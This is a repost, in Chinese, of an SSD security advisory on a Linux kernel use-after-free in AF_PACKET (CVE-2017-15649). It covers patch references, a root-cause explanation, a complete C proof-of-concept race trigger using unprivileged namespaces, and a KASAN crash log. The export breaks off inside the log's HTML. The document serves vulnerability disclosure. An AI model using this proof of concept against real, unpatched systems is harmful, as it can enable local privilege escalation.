{"id":10624,"date":"2017-11-27T14:19:16","date_gmt":"2017-11-27T22:19:16","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4396\/"},"modified":"2017-11-27T14:19:16","modified_gmt":"2017-11-27T22:19:16","slug":"news-4396","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4396\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a\u2013Linux\u5185\u6838AF_PACKET \u91ca\u653e\u540e\u91cd\u7528\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 08:12:04 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3543\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3543');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><\/p>\n<p>\u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Linux\u5185\u6838\u7684AF_PACKET\u4e2d\u5b58\u5728\u7684\u4e00\u4e2aUAF\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u6743\u9650\u63d0\u5347\u3002<\/p>\n<p>AF_PACKET\u5957\u63a5\u5b57\u201d\u5141\u8bb8\u7528\u6237\u5728\u8bbe\u5907\u9a71\u52a8\u5c42\u53d1\u9001\u6216\u8005\u63a5\u6536\u6570\u636e\u5305\u201d\u3002\u4f8b\u5982\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u7269\u7406\u5c42\u4e4b\u4e0a\u5b9e\u73b0\u81ea\u5df1\u7684\u534f\u8bae\uff0c\u6216\u8005\u55c5\u63a2\u5305\u542b\u4ee5\u592a\u7f51\u6216\u66f4\u9ad8\u5c42\u534f\u8bae\u5934\u7684\u6570\u636e\u5305\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><\/p>\n<p>\u4e00\u540d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u5e76\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><\/p>\n<p>\u66f4\u65b0\u4e00<\/p>\n<p>CVE:CVE-2017-15649<\/p>\n<p>\u201c\u8be5\u6f0f\u6d1e\u5f88\u53ef\u80fd\u5df2\u7ecf\u901a\u8fc7\u4ee5\u4e0b\u65b9\u5f0f\u4fee\u590d\u4e86\uff1a<\/p>\n<p>packet: \u91cd\u65b0\u7ed1\u5b9afanout hook\u65f6\u4fdd\u6301\u7ed1\u5b9a\u9501\u5b9a &#8211; http:\/\/patchwork.ozlabs.org\/patch\/813945\/<\/p>\n<p>\u4e0e\u6b64\u76f8\u5173\uff0c\u4f46\u672a\u5408\u5e76\u7684\u662f<\/p>\n<p>packet:\u5728packet_do_bind\u51fd\u6570\u4e2d\uff0c\u4f7f\u7528bind_lock\u6d4b\u8bd5fanout &#8211; http:\/\/patchwork.ozlabs.org\/patch\/818726\/<\/p>\n<p>\u6211\u4eec\u9a8c\u8bc1\u4e86\u5728v4.14-rc2\u4e0a\u4e0d\u4f1a\u89e6\u53d1\u8be5\u6f0f\u6d1e\uff0c\u4f46\u5728\u7b2c\u4e00\u6b21commit(008ba2a13f2d)\u4e0a\u6d4b\u8bd5\u6210\u529f\u3002&#8221;<\/p>\n<p><span id=\"more-3543\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><\/p>\n<p>\u8be5UAF\u6f0f\u6d1e\u662f\u7531\u4e8efanout_add(\u6765\u81easetsockopt)\u548cAF_PACKET\u5957\u63a5\u5b57\u4e4b\u95f4\u7ade\u4e89\u6761\u4ef6\u5bfc\u81f4\u7684\u3002<\/p>\n<p>\u5373\u4f7f\u5df2\u7ecf\u4ecefanout_add()\u521b\u5efa\u4e86\u4e00\u4e2apacket_fanout\uff0c\u7ade\u4e89\u4e5f\u4f1a\u5bfc\u81f4\u6765\u81eapacket_do_bind()\u7684__unregister_prot_hook()\u5c06po-> running\u8bbe\u7f6e\u4e3a0\u3002<\/p>\n<p>\u8fd9\u5141\u8bb8\u6211\u4eec\u7ed5\u8fc7packet_release()\u4e2d\u7684unregister_prot_hook()\u7684\u68c0\u67e5\uff0c\u4ece\u800c\u5bfc\u81f4\u5373\u4f7fpacket_fanout\u5df2\u7ecf\u88ab\u91ca\u653e\uff0c\u4f46\u662f\u4ecd\u7136\u53ef\u4ee5\u4ecepacket_type\u94fe\u63a5\u5217\u8868\u5f15\u7528\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6415a75473642493\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/\/ Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel.  \/\/ the kernel config is provided too.    #define _GNU_SOURCE    #include &lt;stdio.h&gt;  #include &lt;stdlib.h&gt;  #include &lt;string.h&gt;  #include &lt;unistd.h&gt;  #include &lt;sys\/types.h&gt;  #include &lt;sys\/socket.h&gt;  #include &lt;sys\/ioctl.h&gt;  #include &lt;net\/if.h&gt;  #include &lt;pthread.h&gt;  #include &lt;sys\/utsname.h&gt;  #include &lt;sched.h&gt;  #include &lt;stdarg.h&gt;  #include &lt;stdbool.h&gt;  #include &lt;sys\/stat.h&gt;  #include &lt;fcntl.h&gt;    #define IS_ERR(c, s) { if (c) perror(s); }    struct sockaddr_ll {  \tunsigned short\tsll_family;  \tshort\t\tsll_protocol; \/\/ big endian  \tint\t\tsll_ifindex;  \tunsigned short\tsll_hatype;  \tunsigned char\tsll_pkttype;  \tunsigned char\tsll_halen;  \tunsigned char\tsll_addr[8];  };    static int fd;  static struct ifreq ifr;  static struct sockaddr_ll addr;    void *task1(void *unused)  {\t  \tint fanout_val = 0x3;    \t\/\/ need race: check on po-&gt;running  \t\/\/ also must be 1st or link wont register  \tint err = setsockopt(fd, 0x107, 18, &amp;fanout_val, sizeof(fanout_val));  \t\/\/ IS_ERR(err == -1, &#8220;setsockopt&#8221;);\t  }    void *task2(void *unused)  {  \tint err = bind(fd, (struct sockaddr *)&amp;addr, sizeof(addr));  \t\/\/ IS_ERR(err == -1, &#8220;bind&#8221;);  }    void loop_race()  {  \tint err, index;    \twhile(1) {  \t\tfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);  \t\tIS_ERR(fd == -1, &#8220;socket&#8221;);    \t\tstrcpy((char *)&amp;ifr.ifr_name, &#8220;lo&#8221;);  \t\terr = ioctl(fd, SIOCGIFINDEX, &amp;ifr);  \t\tIS_ERR(err == -1, &#8220;ioctl SIOCGIFINDEX&#8221;);  \t\tindex = ifr.ifr_ifindex;    \t\terr = ioctl(fd, SIOCGIFFLAGS, &amp;ifr);  \t\tIS_ERR(err == -1, &#8220;ioctl SIOCGIFFLAGS&#8221;);    \t\tifr.ifr_flags &amp;= ~(short)IFF_UP;  \t\terr = ioctl(fd, SIOCSIFFLAGS, &amp;ifr);  \t\tIS_ERR(err == -1, &#8220;ioctl SIOCSIFFLAGS&#8221;);    \t\taddr.sll_family = AF_PACKET;  \t\taddr.sll_protocol = 0x0; \/\/ need something different to rehook &amp;&amp; 0 to skip register_prot_hook  \t\taddr.sll_ifindex = index;    \t\tpthread_t thread1, thread2;  \t    pthread_create (&amp;thread1, NULL, task1, NULL);  \t    pthread_create (&amp;thread2, NULL, task2, NULL);    \t    pthread_join(thread1, NULL);  \t    pthread_join(thread2, NULL);    \t\t\/\/ UAF  \t\tclose(fd);   \t}  }    static bool write_file(const char* file, const char* what, &#8230;) {  \tchar buf[1024];  \tva_list args;  \tva_start(args, what);  \tvsnprintf(buf, sizeof(buf), what, args);  \tva_end(args);  \tbuf[sizeof(buf) &#8211; 1] = 0;  \tint len = strlen(buf);    \tint fd = open(file, O_WRONLY | O_CLOEXEC);  \tif (fd == -1)  \t\treturn false;  \tif (write(fd, buf, len) != len) {  \t\tclose(fd);  \t\treturn false;  \t}  \tclose(fd);  \treturn true;  }    void setup_sandbox() {  \tint real_uid = getuid();  \tint real_gid = getgid();    \tif (unshare(CLONE_NEWUSER) != 0) {  \t\tprintf(&#8220;[!] unprivileged user namespaces are not availablen&#8221;);  \t\tperror(&#8220;[-] unshare(CLONE_NEWUSER)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  \tif (unshare(CLONE_NEWNET) != 0) {  \t\tperror(&#8220;[-] unshare(CLONE_NEWUSER)&#8221;);  \t\texit(EXIT_FAILURE);  \t}    \tif (!write_file(&#8220;\/proc\/self\/setgroups&#8221;, &#8220;deny&#8221;)) {  \t\tperror(&#8220;[-] write_file(\/proc\/self\/set_groups)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  \tif (!write_file(&#8220;\/proc\/self\/uid_map&#8221;, &#8220;0 %d 1n&#8221;, real_uid)) {  \t\tperror(&#8220;[-] write_file(\/proc\/self\/uid_map)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  \tif (!write_file(&#8220;\/proc\/self\/gid_map&#8221;, &#8220;0 %d 1n&#8221;, real_gid)) {  \t\tperror(&#8220;[-] write_file(\/proc\/self\/gid_map)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  }    int main(int argc, char *argv[])   {  \tsetup_sandbox();  \tsystem(&#8220;id; capsh &#8211;print&#8221;);  \tloop_race();\t  \treturn 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0111 seconds] -->  <\/p>\n<p><strong>\u5d29\u6e83\u65e5\u5fd7<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6415a7f994363130\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [   73.703931] dev_remove_pack: ffff880067cee280 not found  [   73.717350] ==================================================================  [   73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1\/0x1f0  [   73.729371] Write of size 8 at addr ffff880067d28870 by task poc\/1175  [   73.732594]   [   73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29  [   73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04\/01\/2014  [   73.746433] Call Trace:  [   73.747985]  dump_stack+0x6c\/0x9c  [   73.749410]  ? dev_add_pack+0x1b1\/0x1f0  [   73.751622]  print_address_description+0x73\/0x290  [   73.753646]  ? dev_add_pack+0x1b1\/0x1f0  [   73.757343]  kasan_report+0x22b\/0x340  [   73.758839]  __asan_report_store8_noabort+0x17\/0x20  [   73.760617]  dev_add_pack+0x1b1\/0x1f0  [   73.761994]  register_prot_hook.part.52+0x90\/0xa0  [   73.763675]  packet_create+0x5e3\/0x8c0  [   73.765072]  __sock_create+0x1d0\/0x440  [   73.766030]  SyS_socket+0xef\/0x1b0  [   73.766891]  ? move_addr_to_kernel+0x60\/0x60  [   73.769137]  ? exit_to_usermode_loop+0x118\/0x150  [   73.771668]  entry_SYSCALL_64_fastpath+0x13\/0x94  [   73.773754] RIP: 0033:0x44d8a7  [   73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029  [   73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7  [   73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011  [   73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0  [   73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410  [   73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000  [   73.798567]   [   73.799095] Allocated by task 1360:  [   73.800300]  save_stack_trace+0x16\/0x20  [   73.802533]  save_stack+0x46\/0xd0  [   73.803959]  kasan_kmalloc+0xad\/0xe0  [   73.805833]  kmem_cache_alloc_trace+0xd7\/0x190  [   73.808233]  packet_setsockopt+0x1d29\/0x25c0  [   73.810226]  SyS_setsockopt+0x158\/0x240  [   73.811957]  entry_SYSCALL_64_fastpath+0x13\/0x94  [   73.814636]   [   73.815367] Freed by task 1175:  [   73.816935]  save_stack_trace+0x16\/0x20  [   73.821621]  save_stack+0x46\/0xd0  [   73.825576]  kasan_slab_free+0x72\/0xc0  [   73.827477]  kfree+0x91\/0x190  [   73.828523]  packet_release+0x700\/0xbd0  [   73.830162]  sock_release+0x8d\/0x1d0  [   73.831612]  sock_close+0x16\/0x20  [   73.832906]  __fput+0x276\/0x6d0  [   73.834730]  ____fput+0x15\/0x20  [   73.835998]  task_work_run+0x121\/0x190  [   73.837564]  exit_to_usermode_loop+0x131\/0x150  [   73.838709]  syscall_return_slowpath+0x15c\/0x1a0  [   73.840403]  entry_SYSCALL_64_fastpath+0x92\/0x94  [   73.842343]   [   73.842765] The buggy address belongs to the object at ffff880067d28000  [   73.842765]  which belongs to the cache kmalloc-4096 of size 4096  [   73.845897] The buggy address is located 2160 bytes inside of  [   73.845897]  4096-byte region [ffff880067d28000, ffff880067d29000)  [   73.851443] The buggy address belongs to the page:  [   73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0  [   73.861329] flags: 0x100000000008100(slab|head)  [   73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007  [   73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000  [   73.870617] page dumped because: kasan: bad access detected  [   73.872456]   [   73.872851] Memory state around the buggy address:  [   73.874057]  ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.876931]  ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.878913] &gt;ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.880658]                                                              ^  [   73.884772]  ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.890978]  ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.897763] ==================================================================<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a7f994363130-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a7f994363130-73\">73<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.703931<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_remove_pack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880067cee280 <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">found<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.717350<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.726151<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KASAN<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">use<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">after<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">free <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.729371<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Write <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at 